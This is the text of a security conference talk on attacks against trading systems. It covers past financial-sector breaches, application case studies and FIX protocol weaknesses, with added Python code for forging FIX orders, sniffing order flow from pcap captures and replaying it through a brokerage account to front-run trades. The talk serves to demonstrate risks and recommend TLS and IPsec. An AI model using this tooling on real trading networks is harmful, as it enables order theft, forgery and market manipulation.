Hacking The Trading Floor
Gyan Chawdhary
Session ID: HT2-304
Session Classification: Intermediate
Agenda
BRIEF HISTORY OF ECONOMIC HACKS
APPLICATION ISSUES
FIX ATTACKS
Brief History of Economic Hacks
Brief History Of Security Compromises in the Banking Sector
More Recently … (2008-2010)
Sergey Aleynikov, a former Goldman Sachs computer programmer, was indicted and prosecuted on charges of stealing HFT algorithm source code.
UBS filed a lawsuit against three former quants, alleging they had stolen proprietary algorithmic trading software with the intent of using it at their new employer.
Ukrainian hacker Oleksandr Dorozhko was charged with insider trading by the SEC. Mr Dorozhko traded option contracts on information gained by accessing earnings data on a staging server before its release date.
Even More Recently … (Dec 2010 - Jan 2011)
Romanian Registry (Carbon Trading Platform): 1.6 million CO2 certificates were stolen from the Holcim Cement account. The credits were transferred to hacker-controlled accounts in other EU states.
Czech / Austrian Registry (Carbon Trading Platform): two million credits worth 2.8 million were stolen and transferred to other registries and/or sold to other market participants.
Even More Recently … (Dec 2010 - Jan 2011)
NASDAQ Directors Desk Application: currently being investigated for a potential breach. Directors Desk is an EMS application that allows executives to share sensitive documents, including earnings data, board minutes etc.
Common Theme / Trends
Attackers are still leveraging the low-hanging fruit: the security issues used to compromise these systems are well known.
As of 2011, the threats are increasing in both scale and sophistication.
The outsider threat is increasing.
Application Security
Case Studies
Trade Optimized Strategy Engine Issues
OTC Trading Platforms Issues
Thick Client Trading Platforms Issues
Reconciliation Platform Issues
Indices Application Insecurities
Computational Grid Attacks
Trade Optimized Strategy Engine
WHAT: Class of applications used for the submission and analysis of investment/trading strategies.
WHO: Used mainly by funds, banks and investment management firms employing global macro / event-driven trading strategies.
HOW: Third-party brokers, analysts and economists access the application to upload trading strategies/ideas. The application uses statistical and/or proprietary algorithms to index/rate the submitted strategies. Traders trade the highest-rated strategy.
Case Study - Trade Optimized Strategy Engine Issues (Weak Input Validation)
Problems
Infrastructure Issues
Application Issues
Governance
OTC Trading Platforms
WHAT: Predominantly dealer applications for trading over-the-counter derivatives.
WHO: Used by almost all banks dealing in the credit derivatives markets (CDO, CDS, IRS etc). Mainly used for structuring instruments based on client requirements, which are then traded directly or through a dealer. Mainly used by front office quants/traders.
HOW: Trades are executed using commercial and/or bespoke platforms. Post-trade processing can be carried out in-house or outsourced.
Case Study – Bank OTC Trading Platform Issues (Trade Data / Client Discovery Attack)
Problems
Application Issues
Governance
Thick Client Trading Platforms
WHAT: Any front, middle or back office trading application. Often developed for business/analyst staff and/or used to extend trading services to third-party clients.
Case Study - Thick Client Trading Platform Issues (Forex Broker-Dealer Application)
Problems
Application Issues
Case Study - Reconciliation Platform Issues
Indices Applications
Definition: Index - a basket/collection/group of securities used to track the performance of a market/sector/asset. Can be traded as futures/options contracts or used as the underlying for other products.
WHO: Mostly developed and managed by exchanges, rating agencies and banks.
HOW: A committee or bespoke methods/benchmarks are used to rebalance indices.
Case Study - Index Rebalancing/Turnover Attacks
Computational Grids
WHAT: High performance computing grids used for running solvers, simulations and analysis of financial time series data (Monte Carlo, volatility, OP etc).
WHO: Mostly institutions and departments involved with financial modeling. Users tend to be quants, traders and analysts.
HOW: Models are submitted to the grid environment using web services, custom APIs and/or remote access.
Case Study - Computational Grid Attacks
Problems
Infrastructure Issues
Application Issues
Governance
FIX Protocol Weaknesses
What is FIX Protocol ?
The Financial Information eXchange (FIX) protocol is an electronic communications protocol initiated in 1992 for international real-time exchange of information related to securities transactions and markets – Wikipedia
In other words, the protocol facilitates the buying and selling of securities electronically.
Who Uses FIX
FIX is widely used by both the buy side (institutions) and the sell side (brokers/dealers) in the financial markets.
Amongst its users are hedge funds, mutual funds, investment banks, brokers and stock exchanges.
Transaction types supported: pretty much all asset classes, i.e. equities, bonds, derivatives and forex.
Why Investigate FIX ?
FIX security is often overlooked in favour of operating system and host security.
To demonstrate that FIX-based front running is possible and not difficult to exploit.
To identify mitigating factors and strategies for some of the existing issues within the FIX protocol.
Algorithmic Trading Architecture
High Frequency Trading Architecture
Order Front Running (Demo)
Demo Environment:
Algorithmic Trading Environment – a simulated algorithmic/high frequency trading environment.
Brokerage Account – a hacker-controlled brokerage account used to replay the sniffed orders.
Order Sniffer
Note: The examples used during this demonstration are not intended to suggest any insecurities or weaknesses in the third-party applications; they are only to be seen as a case study demonstrating FIX protocol insecurities.
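The demo above rests on one property of a plain FIX session: every order is tag=value text on the wire, and the only check on it is the tag 10 checksum. The following is an added example (not code from the talk, and not the talk's sniffer) that shows the two halves of that: a parser that validates the FIX framing and pulls the order fields out of NewOrderSingle (35=D) messages, and a builder that shows how little an active attacker needs to forge a message that passes that check. The capture is constructed inline; the CompIDs HEDGEFUND and BROKER, the ClOrdID and the prices are made-up demo values.

```python
# Added example, not code from the talk: a minimal passive FIX sniffer with
# checksum validation. The capture below is constructed inline; the CompIDs
# (HEDGEFUND, BROKER), ClOrdIDs and prices are made-up demo values.
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

SOH = b"\x01"  # FIX field delimiter

# Standard FIX tag numbers used below
TAG_CHECKSUM, TAG_CLORDID, TAG_MSG_TYPE = "10", "11", "35"
TAG_ORDER_QTY, TAG_PRICE, TAG_SIDE, TAG_SYMBOL = "38", "44", "54", "55"
SIDE_NAME = {"1": "BUY", "2": "SELL"}


def fix_checksum(data: bytes) -> str:
    """Tag 10 value: byte sum mod 256 of everything up to and including the
    SOH that precedes '10='. It is a transmission check, not an integrity
    control: whoever can alter the message can recompute it."""
    return f"{sum(data) % 256:03d}"


def parse_fix(raw: bytes) -> Optional[Dict[str, str]]:
    """Split one FIX message into a tag -> value dict.
    Returns None if the message is truncated or the checksum does not match."""
    idx = raw.find(SOH + b"10=")
    if idx < 0 or not raw.endswith(SOH):
        return None
    fields: Dict[str, str] = {}
    for field in raw.rstrip(SOH).split(SOH):
        tag, _, value = field.partition(b"=")
        fields[tag.decode()] = value.decode()
    if fields.get(TAG_CHECKSUM) != fix_checksum(raw[: idx + 1]):
        return None
    return fields


@dataclass
class SniffedOrder:
    clordid: str
    symbol: str
    side: str
    qty: int
    price: Optional[float]


def extract_orders(payloads: List[bytes]) -> List[SniffedOrder]:
    """Keep only NewOrderSingle (35=D) messages and pull out the fields a
    front-runner needs. Without TLS they travel in clear text."""
    orders: List[SniffedOrder] = []
    for raw in payloads:
        msg = parse_fix(raw)
        if msg is None or msg.get(TAG_MSG_TYPE) != "D":
            continue
        price = msg.get(TAG_PRICE)
        orders.append(SniffedOrder(
            clordid=msg[TAG_CLORDID],
            symbol=msg[TAG_SYMBOL],
            side=SIDE_NAME.get(msg[TAG_SIDE], msg[TAG_SIDE]),
            qty=int(msg[TAG_ORDER_QTY]),
            price=float(price) if price else None,
        ))
    return orders


def build_fix(fields: List[Tuple[str, str]]) -> bytes:
    """Assemble a FIX 4.2 message with correct BodyLength (9) and CheckSum (10).
    Used here to construct the sample capture; an active attacker needs nothing
    more than this to forge a message that passes the checksum."""
    body = SOH.join(f"{t}={v}".encode() for t, v in fields) + SOH
    head = b"8=FIX.4.2" + SOH + f"9={len(body)}".encode() + SOH
    return head + body + b"10=" + fix_checksum(head + body).encode() + SOH


# Constructed capture: a genuine buy order, the same bytes after a one-byte edit
# to the quantity (checksum now wrong), and a forged copy with the checksum
# recomputed (accepted, since nothing in the message is authenticated).
ORDER_FIELDS = [("35", "D"), ("49", "HEDGEFUND"), ("56", "BROKER"), ("34", "2"),
                ("11", "ORD-1"), ("55", "AAPL"), ("54", "1"), ("38", "5000"),
                ("40", "2"), ("44", "350.25")]
GOOD = build_fix(ORDER_FIELDS)
TAMPERED = GOOD.replace(b"38=5000", b"38=9000")
FORGED = build_fix([(t, "9000" if t == "38" else v) for t, v in ORDER_FIELDS])
CAPTURE = [GOOD, TAMPERED, FORGED]


def demo() -> List[SniffedOrder]:
    return extract_orders(CAPTURE)


if __name__ == "__main__":
    for o in demo():
        print(o)
```

Running it yields two accepted orders (the genuine one and the forged one) and silently drops the byte-edited copy. That is the whole of what tag 10 buys you: protection against corruption in transit, not against a party on the path. Confidentiality and integrity of a FIX session have to come from the transport, i.e. TLS on the FIX connection or an IPsec/VPN tunnel between the counterparties, not from anything inside the protocol.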
Algorithmic Trading Environment
Brokerage Account
Order Front Running
LibPcap FIX Sniffing (Slow)

```python
import re

# Patterns applied to the raw payload of each captured packet. FIX is tag=value
# text, so the interesting order fields can be pulled out without a full
# parser (slow, but enough for the demo).
symbol = re.compile('55=[A-Z]*')     # Symbol (AAPL, GOOG ..)
buy = re.compile('54=1')             # Side: BUY order
sell = re.compile('54=2')            # Side: SELL order
order_qty = re.compile('38=[0-9]*')  # Order quantity
price = re.compile('44=[0-9.]*')     # Limit price (may carry a decimal point)
```
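The regexes above are only the last step; the sniffer first has to get at the TCP payload. The following added example (not code from the talk) does the capture-side work offline: it walks a classic libpcap file, dissects the Ethernet/IPv4/TCP headers by hand, and applies a tag=value pattern of the same kind to each payload to pick out NewOrderSingle orders. The pcap bytes are constructed inline with struct, the addresses (10.0.0.5, 10.0.0.9) and port (9878) are made up, and the 9= and 10= fields in the sample messages are placeholders that this block does not validate.

```python
# Added example, not the talk's code: offline libpcap walk plus FIX field
# extraction. The capture is constructed inline; hosts, port and message
# contents are made-up demo values.
import re
import struct
from typing import Dict, Iterator, List

ETHERTYPE_IPV4 = 0x0800
IPPROTO_TCP = 6
PCAP_MAGIC = 0xA1B2C3D4

# Order fields of interest: tag=value pairs delimited by SOH (\x01)
FIELD_RE = re.compile(rb"(?:^|\x01)(35|55|54|38|44)=([^\x01]*)")


def tcp_payloads(pcap: bytes) -> Iterator[bytes]:
    """Yield the TCP payload of every Ethernet/IPv4/TCP record in a classic
    (non-pcapng) libpcap file passed in as bytes."""
    endian = "<" if struct.unpack("<I", pcap[:4])[0] == PCAP_MAGIC else ">"
    if struct.unpack(endian + "I", pcap[:4])[0] != PCAP_MAGIC:
        raise ValueError("not a classic pcap file")
    if struct.unpack(endian + "I", pcap[20:24])[0] != 1:
        raise ValueError("only Ethernet (LINKTYPE 1) captures are handled")
    off = 24
    while off + 16 <= len(pcap):
        _, _, incl_len, _ = struct.unpack(endian + "IIII", pcap[off:off + 16])
        frame = pcap[off + 16: off + 16 + incl_len]
        off += 16 + incl_len
        if len(frame) < 34 or struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_IPV4:
            continue
        ip = frame[14:]
        ihl = (ip[0] & 0x0F) * 4              # IPv4 header length
        total_len = struct.unpack("!H", ip[2:4])[0]
        if ip[9] != IPPROTO_TCP:
            continue
        tcp = ip[ihl:total_len]
        data_off = (tcp[12] >> 4) * 4         # TCP header length
        payload = tcp[data_off:]
        if payload:
            yield payload


def sniff_orders(pcap: bytes) -> List[Dict[str, str]]:
    """One dict per captured NewOrderSingle (35=D) holding the fields a passive
    observer can read straight off the wire."""
    orders = []
    for payload in tcp_payloads(pcap):
        fields = {t.decode(): v.decode() for t, v in FIELD_RE.findall(payload)}
        if fields.get("35") == "D":
            orders.append(fields)
    return orders


# --- constructed capture (demo data only) -----------------------------------
def _frame(payload: bytes) -> bytes:
    """Minimal Ethernet/IPv4/TCP frame around payload. IP/TCP checksums are left
    zero; an offline dissector does not need them."""
    tcp = struct.pack("!HHIIBBHHH", 40000, 9878, 1, 1, 5 << 4, 0x18, 8192, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, IPPROTO_TCP, 0,
                     bytes([10, 0, 0, 5]), bytes([10, 0, 0, 9])) + tcp
    return bytes(12) + struct.pack("!H", ETHERTYPE_IPV4) + ip


def _pcap(frames: List[bytes]) -> bytes:
    head = struct.pack("<IHHiIII", PCAP_MAGIC, 2, 4, 0, 0, 65535, 1)
    recs = b"".join(struct.pack("<IIII", 0, 0, len(f), len(f)) + f for f in frames)
    return head + recs


# A Logon (35=A) followed by a sell order; 9= and 10= are placeholders here.
SAMPLE_PCAP = _pcap([
    _frame(b"8=FIX.4.2\x019=0\x0135=A\x0149=FUND\x0156=BROKER\x0134=1\x0198=0\x01108=30\x0110=000\x01"),
    _frame(b"8=FIX.4.2\x019=0\x0135=D\x0149=FUND\x0156=BROKER\x0134=2\x0111=ORD-7\x0155=GOOG"
           b"\x0154=2\x0138=1200\x0140=2\x0144=590.10\x0110=000\x01"),
])

if __name__ == "__main__":
    for order in sniff_orders(SAMPLE_PCAP):
        print(order)
```

On a real tap the same loop sits behind a live pcap handle instead of a file, and the only difference between this and the "Fast FIX walker (C++)" mentioned later in the deck is speed: a compiled tag walker avoids the regex overhead but learns nothing the regex does not. The point for the defender is that nothing on this path needs a credential; if the segment (or the office wifi) can be sniffed, the order flow is readable.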
FIX Virus
FIX Virus (cont.)
Binary Tree
Fast FIX walker (C++)
Order Builder
Hedgefund Example - Weak Wifi + FIX sniffer
IbPy Server Side Code - Contract Builder

```python
from ib.ext.Contract import Contract
from ib.ext.Order import Order


def build_stock_contract(symbol, quantity, oid):
    """Build the IB Contract/Order pair for a market BUY of `quantity`
    shares of `symbol`, routed via SMART. Returns (contract, order)."""
    stock = Contract()
    stock.m_symbol = symbol
    stock.m_secType = 'STK'
    stock.m_exchange = 'SMART'
    stock.m_currency = 'USD'
    order = Order()
    order.m_orderId = oid
    order.m_clientId = 0
    order.m_permId = 0
    order.m_action = 'BUY'
    order.m_lmtPrice = 0
    order.m_auxPrice = 0
    order.m_tif = 'DAY'
    order.m_transmit = False     # stage in TWS; set True to send immediately
    order.m_orderType = 'MKT'
    order.m_totalQuantity = quantity
    return stock, order
```
Order Sniffer (Excel plugin) – order encoding